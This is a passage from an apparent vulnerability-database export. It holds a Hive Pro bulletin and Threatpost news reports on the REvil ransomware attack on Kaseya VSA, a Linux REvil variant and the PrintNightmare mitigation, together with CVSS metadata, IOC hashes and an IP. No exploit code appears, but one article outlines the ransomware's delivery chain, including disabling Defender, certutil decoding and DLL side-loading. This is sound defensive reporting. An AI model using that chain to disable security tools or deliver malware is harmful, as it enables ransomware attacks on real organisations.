Destruction\n * T1486: Data Encrypted for Impact\n * T1490: Inhibit System Recovery \n * T1489: Service Stop\n\n#### Threat Actor\n\n![](https://www.hivepro.com/wp-content/uploads/2021/07/Screenshot7656-1024x109.png)\n\n#### Vulnerability Details\n\n![](https://www.hivepro.com/wp-content/uploads/2021/07/VulnerabilityDetails-1024x133.png)\n\n#### Indicators of Compromise\n\n**Type**| **Value** \n---|--- \nIPv4| 161[.]35.239.148 \nHash(SHA1)| d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e \n8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd \ne2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2 \n45AEBD60E3C4ED8D3285907F5BF6C71B3B60A9BCB7C34E246C20410CF678FC0C \n \n#### References\n\n<https://www.bleepingcomputer.com/news/security/kaseya-was-fixing-zero-day-just-as-revil-ransomware-sprung-their-attack/>\n\n<https://otx.alienvault.com/pulse/60e40b4535299fb6755143cf>\n\n<https://us-cert.cisa.gov/ncas/current-activity/2021/07/02/kaseya-vsa-supply-chain-ransomware-attack>\n\n<https://www.tenable.com/blog/cve-2021-30116-multiple-zero-day-vulnerabilities-in-kaseya-vsa-exploited-to-distribute-ransomware>\n\n<https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/>\n\n<https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-08T12:32:57", "type": "hivepro", "title": "REvil Ransomware gang behind the Kaseya VSA Supply-Chain attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2021-07-08T12:32:57", "id": "HIVEPRO:3E02C2FF0A137A10F6A8876C69C320B3", "href": "https://www.hivepro.com/revil-ransomware-gang-behind-the-kaseya-vsa-supply-chain-attack/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2021-07-07T18:25:01", "description": "UPDATE 2\n\nThe worldwide July 2 attacks on the Kaseya Virtual System/Server Administrator (VSA) platform by the REvil ransomware gang turn out to be the result of exploits for at least one zero-day security vulnerability, and the company is swinging into full mitigation mode, with patches for the on-premise version coming sometime this week, it said.\n\nThe VSA software is used by Kaseya customers to remotely monitor and manage software and network infrastructure. It\u2019s supplied either as a hosted cloud service by Kaseya, or via on-premises VSA servers.\n\nThe attacks on the VSA (details on the multiple zero-day bugs believed used are below) are now estimated to have led to the encryption of files for around 60 Kaseya customers using the on-premises version of the platform \u2013 many of which are managed service providers (MSPs) who use VSA to manage the networks of other businesses.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThat MSP connection allowed REvil access to those customers-of-customers, and there are around 1,500 downstream businesses now affected, Kaseya said in an [updated rolling advisory](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-July-2nd-2021>). It\u2019s estimated that more than a million individual systems are locked up, and Kaspersky [on Monday said](<https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/>) that it had seen more than 5,000 attack attempts in 22 countries at that point.\n\n\u201cThe VSA server is used to manage large fleets of computers, and is normally used by MSPs to manage all their clients,\u201d explained researchers at TruSec, [in a post](<https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/>) on Sunday. \u201cWithout separation between client environments, this creates a dependency: If the VSA server is compromised, all client environments managed from this server can be compromised too.\u201d\n\nIt added, \u201cAdditionally, if the VSA server is exposed to internet, any potential vulnerability could be leveraged over the internet to breach the server. This is what happened in this case. The threat actor, an affiliate of the REvil ransomware-as-a-service, identified and exploited a zero-day vulnerability in the VSA server. The vulnerability was exploited to introduce a malicious script to be sent to all computers managed by the server, therefore reaching all the end clients. The script delivered the REvil ransomware and encrypted the systems.\u201d\n\nThus, while customers wait for patches, \u201cAll on-premises VSA servers should continue to remain offline until further instructions from Kaseya about when it is safe to restore operations,\u201d Kaseya said. \u201cA patch will be required to be installed prior to restarting the VSA and a set of recommendations on how to increase your security posture.\u201d\n\nMeanwhile, \u201cwe have been advised by our outside experts, that customers who experienced ransomware and receive communication from the attackers should not click on any links \u2013 they may be weaponized,\u201d the firm added.\n\nThe company has also released a new version of a [compromise detection tool](<https://kaseya.box.com/s/p9b712dcwfsnhuq2jmx31ibsuef6xict>) for companies to analyze a system (either VSA server or managed endpoint) and determine whether any indicators of compromise (IoC), data encryption or the REvil ransom note are present.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) and the FBI also offered joint [protection advice](<https://threatpost.com/kaseya-attack-fallout/167541/>) over the weekend for those not yet affected by the attacks.\n\nKaseya also took the software-as-a-service (SaaS) platform offline, reducing significantly the number of customers exposed to the internet and therefore for to attacks. Though it was scheduled to be back online Tuesday (the kickoff will be a staged comeback that will see functionality turned back on in waves), but Kaseya said that it ran into a problem with the update. It now plans to start restoring SaaS services no later than the evening of Thursday, July 8.\n\nAs for the on-prem patch, the company will be publishing a runbook Wednesday of the changes customers must to make to their environment to prepare for the patch release, which is now expected by Friday.\n\n### Planned Enhanced Security Measures\n\nAccording to Kaseya, the enhanced security measures that will be brought online with the SaaS update are:\n\n * 24/7 independent SOC for every VSA with the ability to quarantine and isolate files and entire VSA servers.\n * A complementary CDN with WAF for every VSA (including for on-premise users that opt-in and wish to use it)\n * Customers who whitelist IPs will be required to whitelist additional IPs.\n\nThis \u201cgreatly reduces the attack surface of Kaseya VSA overall,\u201d the company said.\n\n## **REvil Lowers Ransom for Universal Decryptor**\n\nREvil is offering a universal public decryption key that will remediate all impacted victims, it said. While the initial ransom price was $70 million, the gang has lowered its asking price to $50 million [according to one researcher](<https://twitter.com/jackhcable/status/1411906687968161792>).\n\nAbsent a universal decryptor, some impacted companies are turning to individual negotiations with REvil, according [to reports](<https://www.databreaches.net/some-kaseya-victims-privately-negotiating-with-revil/>). For instance, researcher Marco A. De Felice [described (in Italian)](<https://www.suspectfile.com/kaseya-data-breach-70m-per-il-decrittatore-universale-intanto-revil-tratta-privatamente-con-alcune-vittime/>) a set of observed chat logs, with various individual company ransoms being listed at $550,000 (and then lowered to $225,000), and in another case the ransom was less than $50,000.\n\nUnfortunately, for those already infected by the REvil ransomware, the ability to remediate an attack will come down to case-by-case security postures, such as having offline backups of files in place.\n\n\u201cREvil uses the Salsa20 symmetric stream algorithm for encrypting the content of files and the keys for it with an elliptic curve asymmetric algorithm,\u201d according to Kaspersky researchers. \u201cDecryption of files affected by this malware is impossible without the cybercriminals\u2019 keys due to the secure cryptographic scheme and implementation used in the malware.\u201d\n\n## **Zero Days, Not SolarWinds Part 2**\n\nThe attack itself appears to be more akin to the [Accellion attacks](<https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/>) that cropped up all spring rather than the devastating [SolarWinds supply-chain attack](<https://threatpost.com/solarwinds-attackers-dhs-emails/165110/>) earlier this year.\n\nThe former had to do with zero-day vulnerabilities that were present in the Accellion legacy File Transfer Appliance product. Bad actors with connections to the FIN11 and the Clop ransomware gang hit multiple Accellion FTA customers in the financially motivated attacks, including the Jones Day Law Firm, Kroger and Singtel. All received extortion emails threatening to publish stolen data on the \u201cCL0P^_- LEAKS\u201d .onion website.\n\nSolarWinds meanwhile was an attack that the U.S. attributed to the Russian government, which involved tampering with SolarWinds\u2019 back-end systems in order to push a boobytrapped software update to unsuspecting customers containing a backdoor. Follow-on espionage attacks then were attempted targeting tech firms and several U.S. government agencies.\n\nIn the Kaseya case, adversaries are exploiting at least one zero-day security vulnerability, to push ransomware to Kaseya\u2019s customers.\n\n\u201cThe attackers were able to exploit zero-day vulnerabilities in the VSA product to bypass authentication and run arbitrary command execution,\u201d the company [noted](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403584098961>) in its technical incident analysis. \u201cThis allowed the attackers to leverage the standard VSA product functionality to deploy ransomware to endpoints. There is no evidence that Kaseya\u2019s VSA codebase has been maliciously modified.\u201d\n\nKaseya knew about one bug (CVE-2021-30116) before the attacks started \u2013 it had been reported to the company by the Dutch Institute for Vulnerability Disclosure (DIVD).\n\n\u201cDuring the entire process, Kaseya has shown that they were willing to put in the maximum effort and initiative into this case both to get this issue fixed and their customers patched,\u201d according to [a DIVD advisory](<https://csirt.divd.nl/2021/07/04/Kaseya-Case-Update-2/>). \u201cThey showed a genuine commitment to do the right thing. Unfortunately, we were beaten by REvil in the final sprint, as they could exploit the vulnerabilities before customers could even patch.\u201d\n\nSeparately, researchers at Huntress Labs identified a zero-day used in the attack, though it\u2019s unclear if it\u2019s separate from CVE-2021-30116: \u201cHuntress has confirmed that cybercriminals have exploited an arbitrary file upload and code injection vulnerability and have high confidence an authentication bypass was used to gain access into these servers,\u201d [it said](<https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident>).\n\nTruSec meanwhile noted that \u201c[while] not all details have been confirmed yet, but we can say with high confidence that the exploit involved multiple flaws: Authentication bypass; arbitrary file upload; code injection.\u201d\n\nAccording to Kaspersky, the exploit involves the attackers deploying a malicious dropper via a PowerShell script. That script disables Microsoft Defender features and then uses the certutil.exe utility to decode a malicious executable (agent.exe) that drops an older version of Microsoft Defender, along with the REvil ransomware packed into a malicious library. That library is then loaded by the legitimate MsMpEng.exe by utilizing the DLL side-loading technique, according to the firm.\n\nOther technical details on the bug and attack chain are scant, for now.\n\nKaseya is due to post another update Tuesday morning, and Threatpost will update this post accordingly.\n\n**Update 2: This post was updated at 2:15 p.m. ET on July 7 to reflect a revised patch timeline and expected debut of a runbook for preparing for the patch.**\n\n**Update 1: This post was updated at 10:30 a.m. ET on July 7 to include a revised patch timeline and planned enhanced security measures.**\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-06T15:42:42", "type": "threatpost", "title": "Kaseya Patches Imminent After Zero-Day Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-30116"], "modified": "2021-07-06T15:42:42", "id": "THREATPOST:DBAD1B8DE4447AB94094A76E7F0EF6A1", "href": "https://threatpost.com/kaseya-patches-zero-day-exploits/167548/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-06T21:35:58", "description": "UPDATE\n\nCybercriminals behind a string of high-profile ransomware attacks, including [one extorting $11 million from JBS Foods](<https://threatpost.com/jbs-paid-11m/166767/>) last month, have ported their malware code to the Linux operating system. The unusual move is an attempt to target VMware\u2019s ESXi virtual machine management software and network attached storage (NAS) devices that run on the Linux operating system (OS).\n\nResearchers at AT&T Cybersecurity said they have confirmed four Linux samples of the REvil malware in the wild.\n\nOfer Caspi, security researcher at Alien Labs, a division of AT&T Cybersecurity, wrote[ in a Thursday blog](<https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version>) that after receiving a tip from [MalwareHuntingTeam](<https://twitter.com/malwrhunterteam/status/1409577829289934851?s=20>) it identified the four samples.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cREvil ransomware authors have expanded their arsenal to include Linux ransomware, which allows them to target ESXi and NAS devices,\u201d Caspi wrote.\n\nIn a nod to research by [AdvIntel](<https://twitter.com/y_advintel/status/1391450354051653633>) in early May 2021, which reported REvil\u2019s intent to port its Windows-based ransomware to Linux, Caspi confirmed the Linux variant was spotted in May \u201caffecting *nix systems and ESXi.\u201d\n\n\u201cThe samples are ELF-64 executables, with similarities to the Windows REvil executable, being the most noticeable among the configuration options,\u201d he wrote.\n\nExecutable and Linkable Format (or ELF-64) is a standard file format for executable files within Linux and UNIX-like operating systems, [according to a technical breakdown](<https://0xax.gitbooks.io/linux-insides/content/Theory/linux-theory-2.html>).\n\n## **Linux Ransomware: Rare, but Real **\n\nWhat makes Alien Labs\u2019 discovery of the Linux REvil variant unique is that the Linux, Unix and other Unix-like computer operating systems, are not typically targeted by adversaries. Microsoft Windows computer systems generally deliver the biggest return for an attacker\u2019s effort because of the ubiquity of the OS. Furthermore, instances of Linux are generally well-protected against vulnerabilities, thanks to a tightknit user-base delivering fast security updates.\n\nPast examples of Linux malware over the past several years have included Tycoon, Lilocked (or Lilu) and [QNAPCrypt](<https://threatpost.com/qnap-flaws-plague-nas-systems/161924/>). In November, Kaspersky identified a Linux sample of RansomEXX. Researchers noted that criminals based its Linux variant on \u201cWinAPI (functions specific to Windows OS)\u201d and used a similar mechanism to manipulate targeted Linux MBED TLS libraries.\n\nMBED TLS is an implementation of the TLS and SSL protocols distributed under the Apache License.\n\n\u201cThe Apache license itself has nothing to do with web servers, other than it being one of the more widely used pieces of software that uses the license, among hundreds of thousands of other open source projects,\u201d said Kenneth White, director of the Open Crypto Audit Project.\n\nIn May, researchers noted criminals behind the [DarkSide ransomware also released a Linux variant](<https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html>). Attackers also targeted, \u201cvirtual machine-related files on VMware ESXI servers.\u201d Researchers said the malware \u201cparses its embedded configuration, kills virtual machines, encrypts files on the infected machine, collects system information, and sends it to the remote server.\u201d\n\n## **Targeted Attacks: Linux in the Crosshairs **\n\nVMware ESXi, formerly known as ESX, is a bare metal hypervisor that installs easily on to your server and partitions it into multiple virtual machines (VM).\n\n\u201cThe hypervisor ESXi allows multiple virtual machines to share the same hard drive storage. However, this also enables attackers to encrypt the centralized virtual hard drives used to store data from across VMs, potentially causing disruptions to companies,\u201d Alien Labs reported. \u201c[I]n addition to targeting ESXi, REvil is also targeting NAS devices as another storage platform with the potential to highly impact the affected companies.\u201d\n\nResearchers said the Linux version of REvil share similar attributes to the Windows OS variant. \u201cThe [executable\u2019s] configuration file format is very similar to the one observed for REvil Windows samples, but with fewer fields,\u201d Caspi wrote.\n\nSimilarities also include:\n\n * Base64-encoded value containing the attacker\u2019s public key used to encrypt files.\n * Ransomware-as-a-service (RaaS) affiliate identifier (7987) is shared between both operating systems.\n * The ransom note\u2019s body content is encoded in base64.\n * The encrypted extensions, which appears to be five random character, both are: .rhkrc, .qoxaq, .naixq, and . 7rspj.\n\n\u201cThe threat actors behind REvil RaaS have rapidly developed a Linux version to compete against the recently released Linux version of DarkSide. It is hard to clarify if these two RaaS are competing against each other or collaborating team members, as stated by other security researchers,\u201d researchers wrote.\n\n_**(This article was updated 7/6 at 12:40 p.m. ET to reflect a clarification on the nature of the Apache software license in the context of MBED TLS.)**_\n\n**Check out our free **[**upcoming live and on-demand webinar events**](<https://threatpost.com/category/webinars/>)** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**\n", "cvss3": {}, "published": "2021-07-01T20:56:15", "type": "threatpost", "title": "Linux Variant of REvil Ransomware Targets VMware\u2019s ESXi, NAS Devices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-30116"], "modified": "2021-07-01T20:56:15", "id": "THREATPOST:CA70B877BD3855C30DBA388CA828583A", "href": "https://threatpost.com/linux-variant-ransomware-vmwares-nas/167511/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-06T21:23:56", "description": "The U.S. government has stepped in to offer a mitigation for a critical remote code execution (RCE) vulnerability in the Windows Print Spooler service that may not have been fully patched by Microsoft\u2019s initial effort to fix it.\n\nTo mitigate the bug, [dubbed PrintNightmare](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>), the CERT Coordination Center (CERT/CC) has released a [VulNote](<https://www.kb.cert.org/vuls/id/383432>) for CVE-2021-1675 urging system administrations to disable the Windows Print Spooler service in Domain Controllers and systems that do not print, the Cybersecurity Infratructure and Security Administration (CISA) said [in a release](<https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability>) Thursday. CERT/CC is part of the Software Engineering Institute, a federally funded research center operated by Carnegie Mellon University.\n\n\u201cWhile Microsoft has released an [update for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>), it is important to realize that this update does NOT protect Active Directory domain controllers, or systems that have [Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>) configured with the NoWarningNoElevationOnInstall option configured,\u201d CERT/CC researchers wrote in the note.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe mitigation is in response to a scenario that unfolded earlier this week when a proof-of-concept (POC) for PrintNightmare was dropped on GitHub on Tuesday. While it was taken back down within a few hours, the code was copied and remains in circulation on the platform. An attacker can use the POC to exploit the vulnerability to take control of an affected system.\n\nIn the meantime, Microsoft Thursday put out a new advisory of its own on PrintNightmare that assigns a new CVE and seems to suggest a new attack vector while attempting to clarify confusion that has arisen over it.\n\nWhile the company originally addressed CVE-2021-1675 in [June\u2019s Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>) as a minor elevation-of-privilege vulnerability, the listing was updated last week after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE.\n\nHowever, soon after it became clear to many experts that the patch appears to fail against the RCE aspect of the bug\u2014hence CISA\u2019s offer of another mitigation and Microsoft\u2019s update.\n\n## **Assignment of New CVE?**\n\nRegarding the latter, the company dropped [a notice](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) Thursday for a bug called \u201cWindows Print Spooler Remote Code Execution Vulnerability\u201d that appears to be the same vulnerability, but with a different CVE number\u2014in this case, CVE-2021-34527.\n\nThe description of the bug sounds like PrintNightmare; indeed, Microsoft acknowledges that it is \u201can evolving situation.\n\n\u201cA remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations,\u201d according to the notice. \u201cAn attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\u201d\n\nIn a \u201cFAQ\u201d section in the security update, Microsoft attempts to explain CVE-2021-34527\u2019s connection to CVE-2021-1675.\n\n\u201cIs this the vulnerability that has been referred to publicly as PrintNightmare? Yes, Microsoft has assigned CVE-2021-34527 to this vulnerability,\u201d the company wrote.\n\nHowever, the answer to the question \u201cIs this vulnerability related to CVE-2021-1675?\u201d suggests that CVE-2021-34527 is a different issue.\n\n\u201cThis vulnerability is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in RpcAddPrinterDriverEx(),\u201d the company wrote. \u201cThe attack vector is different as well. CVE-2021-1675 was addressed by the June 2021 security update.\u201d\n\nMicrosoft goes on to explain that CVE-2021-34527 existed before the June Patch Tuesday updates and that it affects domain controllers in \u201call versions of Windows.\u201d\n\n**\u201c**We are still investigating whether all versions are exploitable,\u201d the company wrote. \u201cWe will update this CVE when that information is evident.\u201d\n\nMicrosoft did not assign a score to CVE-2021-34527, citing its ongoing investigation.\n\n## **Two Vulnerabilities?**\n\nIn retrospect, one security researcher noted to Threatpost when news of PrintNightmare surfaced Tuesday that it was \u201ccurious\u201d that the CVE for the original vulnerability was \u201c-1675,\u201d observing that \u201cmost of the CVEs Microsoft patched in June are -31000 and higher.\u201d\n\n\u201cThis could be an indicator that they have known about this bug for some time, and fully addressing it is not trivial,\u201d Dustin Childs of Trend Micro\u2019s Zero Day Initiative told Threatpost at the time.\n\nNow it appears that perhaps Microsoft was patching only part of a more complex vulnerability. The likely scenario appears to be that there are two bugs in Windows Print Spooler that could offer attackers some kind of exploit chain or be used separately to take over systems.\n\nWhile one flaw may indeed have been addressed in June\u2019s Patch Tuesday update, the other could be mitigated by CERT/CC\u2019s workaround\u2014or could remain to be patched by a future Microsoft update that comes after the company completes its investigation.\n\nThe company\u2019s release Thursday of a new CVE related to PrintNightmare seems to be an initial attempt to clarify the situation, though given its developing nature, it remains a bit hazy for now.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-02T12:21:02", "type": "threatpost", "title": "CISA Offers New Mitigation for PrintNightmare Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-30116", "CVE-2021-34527"], "modified": "2021-07-02T12:21:02", "id": "THREATPOST:933913B1D9B9CF84D33FECFC77C2FDC8", "href": "https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-13T12:49:34", "description": "Kaseya made good on its promise to issue patches by July 11.\n\nOn Saturday, the company behind the Virtual System/Server Administrator (VSA) platform that got walloped by the REvil ransomware-as-a-service (RaaS) gang in a massive supply-chain attack released urgent updates to address critical zero-day security vulnerabilities in VSA.\n\nKaseya [released the VSA 9.5.7a (9.5.7.2994) update](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403785889041>) to fix three zero-day vulnerabilities used in the ransomware attacks.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe company said on its [rolling advisory page](<https://www.kaseya.com/potential-attack-on-kaseya-vsa/>) that all of its software-as-a-service (SaaS) customers were back up as of this morning, while the company was still working to restore on-premises customers that needed help:\n\n> The restoration of services is now complete, with 100% of our SaaS customers live as of 3:30 AM US EDT. Our support teams continue to work with VSA On-Premises customers who have requested assistance with the patch. \u2014Kaseya\n\n## A Brazen Ransomware Blitz\n\nOn July 2, the [REvil gang wrenched open](<https://threatpost.com/kaseya-patches-zero-day-exploits/167548/>) those three VSA zero-days in [more than 5,000 attacks](<https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/>). As of July 5, the worldwide assault had been unleashed in 22 countries, reaching not only Kaseya\u2019s managed service provider (MSP) customer base but also, given that many of them use VSA to manage the networks of other businesses, clawing at those MSP\u2019s customers.\n\nKaseya customers use VSA to remotely monitor and manage software and network infrastructure. It\u2019s supplied either as a hosted cloud service by Kaseya, or via on-premises VSA servers.\n\nFollowing the brazen ransomware attacks, CISA and FBI last week [offered guidance](<https://threatpost.com/kaseya-attack-fallout/167541/>) to victims. Threat actors were quick to exploit the situation, having planted Cobalt Strike backdoors by malspamming a [bogus Microsoft update](<https://threatpost.com/fake-kaseya-vsa-update-cobalt-strike/167587/>) along with a malicious \u201cSecurityUpdates\u201d executable.\n\nAs of July 6, Kaseya said in its [updated rolling advisory](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-July-2nd-2021>) that there were fewer than 60 customers affected but far more \u2013 \u201cfewer than 1,500,\u201d it said \u2013 downstream businesses that got hit.\n\n## Kaseya Dismissed Workers\u2019 Cybersec Warnings\n\nKaseya already knew about these bugs when the attacks were launched. In April, the Dutch Institute for Vulnerability Disclosure (DIVD) had disclosed seven vulnerabilities to Kaseya.\n\nOn Saturday, [Bloomberg](<https://www.bloomberg.com/news/articles/2021-07-10/kaseya-failed-to-address-security-before-hack-ex-employees-say>) reported that software engineering and development employees at Kaseya\u2019s U.S. offices had brought up a laundry list of \u201cwide-ranging cybersecurity concerns\u201d to company leaders multiple times over the course of three years, from 2017 to 2020. When the outlet asked Kaseya to address the anonymous workers\u2019 accusations, a Kaseya spokesperson declined, citing a policy of not commenting on matters involving personnel or the ongoing criminal investigation into the hack.\n\nUPDATE 1: Dana Liedholm, senior vice president of corporate marketing for Kaseya, told Threatpost on Monday that the company has bigger fish to fry than responding to \u201crandom speculation\u201d: \u201cKaseya\u2019s focus is on the customers who have been affected and the people who have actual data and are trying to get to the bottom of it, not on random speculation by former employees or the wider world,\u201d Liedholm said via email.\n\nUPDATE 2: Jake Williams, co-founder and CTO at incident response firm BreachQuest, told Threatpost that dismissing workers\u2019 input as being \u201cspeculation\u201d doesn\u2019t make the accusations less credible. \u201cAfter a quick analysis of the VSA server product, it\u2019s pretty easy to believe these claims,\u201d he said via email. \u201cUntil management at software development firms begin prioritizing security fixes over feature updates, we can expect incidents like this to continue. The fact that Kaseya downplayed the reported 40-page security memo as \u2018speculation\u2019, without denying its existence, is a huge red flag and lends a lot of credence to the claims.\u201d\n\nUPDATE 3: Granted, managing security is tough for any company, including software vendors, noted Dirk Schrader, global vice president of security research at New Net Technologies (NNT). That doesn\u2019t let them off the hook, though, he told Threatpost on Monday. \u201cA company can\u2019t decline doing the essentials, because that is equivalent to being negligent on the risks related to cybersecurity, and there is plenty of material about what is essential.\u201d\n\nQuick searches point to areas in Kaseya\u2019s security that could be improved, Schrader added, such as outdated certificates on networking devices and on Kaseya\u2019s own instances of VSA. \u201cIt comes down to its security operations, its processes and whether they are up to par with the current threat landscape,\u201d Schrader said.\n\nTo support his statement, Schrader pointed to Cisco IOS device(s) [with an outdated cert](<http://\$https://whois.arin.net/rest/net/NET-208-75-20-88-1/pft?s=208.75.20.88\$>) used by Kaseya itself, noting that there are a couple of IPs showing the same issue. He found multiple additional certificate issues, including [this one ](<http://\$https://whois.arin.net/rest/net/NET-208-75-20-88-1/pft?s=208.75.20.88\$>)and [this one](<https://whois.arin.net/rest/net/NET-23-31-43-48-1/pft?s=23.31.43.59>).\n\n## A Baker\u2019s Half-Dozen of Bugs\n\nMost of the seven vulnerabilities reported to Kaseya by DVID were patched on Kaseya\u2019s VSA SaaS service, but up until Saturday, three outstanding security holes on the VSA on-premise version still needed to be battened down. The attackers had snuck into that gap before Kaseya had a chance to bolster its on-premise VSA servers.\n\nThe three on-premise VSA bugs that Kaseya has now stomped:\n\n * [CVE-2021-30116](<https://csirt.divd.nl/cves/CVE-2021-30116>) \u2013 A credentials leak and business logic flaw, included in [version 9.5.7](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403785889041>) rolled out on Saturday.\n * [CVE-2021-30119](<https://csirt.divd.nl/cves/CVE-2021-30119>) \u2013 A cross-site scripting (CSS) vulnerability, included in version 9.5.7.\n * [CVE-2021-30120](<https://csirt.divd.nl/cves/CVE-2021-30120>) \u2013 A bypass of two-factor authentication (2FA), included in version 9.5.7.\n\nFollowing the July 2 onslaught, Kaseya urged on-premise VSA customers to shut down their servers until the patch was ready. To punch up security still more, Kaseya is also [recommending](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403760102417>) limiting network access to the VSA Application/GUI to local IP addresses only, \u201cby blocking all inbound traffic except for port 5721 (the agent port). Administrators will only be able to access the application from the local network or by using a VPN to connect to the local network.\u201d\n\n## Older Bugs\n\nBesides the outstanding trio of bugs Kaseya addressed on Sunday, these are the other four vulnerabilities that DIVD disclosed and which Kaseya already fixed before the July 2 attacks:\n\n * [CVE-2021-30117](<https://csirt.divd.nl/cves/CVE-2021-30117>) \u2013 An SQL injection vulnerability, resolved in a May 8 patch.\n * [CVE-2021-30118](<https://csirt.divd.nl/cves/CVE-2021-30118>) \u2013 A remote code execution (RCE) vulnerability, resolved in an April 10 patch. (v9.5.6)\n * [CVE-2021-30121](<https://csirt.divd.nl/cves/CVE-2021-30121>) \u2013 A [local file inclusion (LFI) vulnerability](<https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion>), resolved in the May 8 patch.\n * [CVE-2021-30201](<https://csirt.divd.nl/cves/CVE-2021-30201>) \u2013 An [XML external entity (XXE) vulnerability](<https://owasp.org/www-community/vulnerabilities/XML_External_Entity_\$XXE\$_Processing>), resolved in the May 8 patch.\n\n071221 11:58 UPDATE: Added commentary from Dana Liedholm.\n\n071221 12:13 UPDATE: Added commentary from Jake Williams.\n\n071221 12:32 UPDATE: Added commentary from Dirk Schrader.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-12T15:53:42", "type": "threatpost", "title": "Kaseya Patches Zero-Days Used in REvil Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-30116", "CVE-2021-30117", "CVE-2021-30118", "CVE-2021-30119", "CVE-2021-30120", "CVE-2021-30121", "CVE-2021-30201"], "modified": "2021-07-12T15:53:42", "id": "THREATPOST:E35CE2557CF4CF511B2359A81096AE4F", "href": "https://threatpost.com/kaseya-patches-zero-days-revil-attacks/167670/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-03-07T15:39:02", "description": "Kaseya VSA before 9.5.7 allows credential disclosure, as exploited in the wild in July 2021. By default 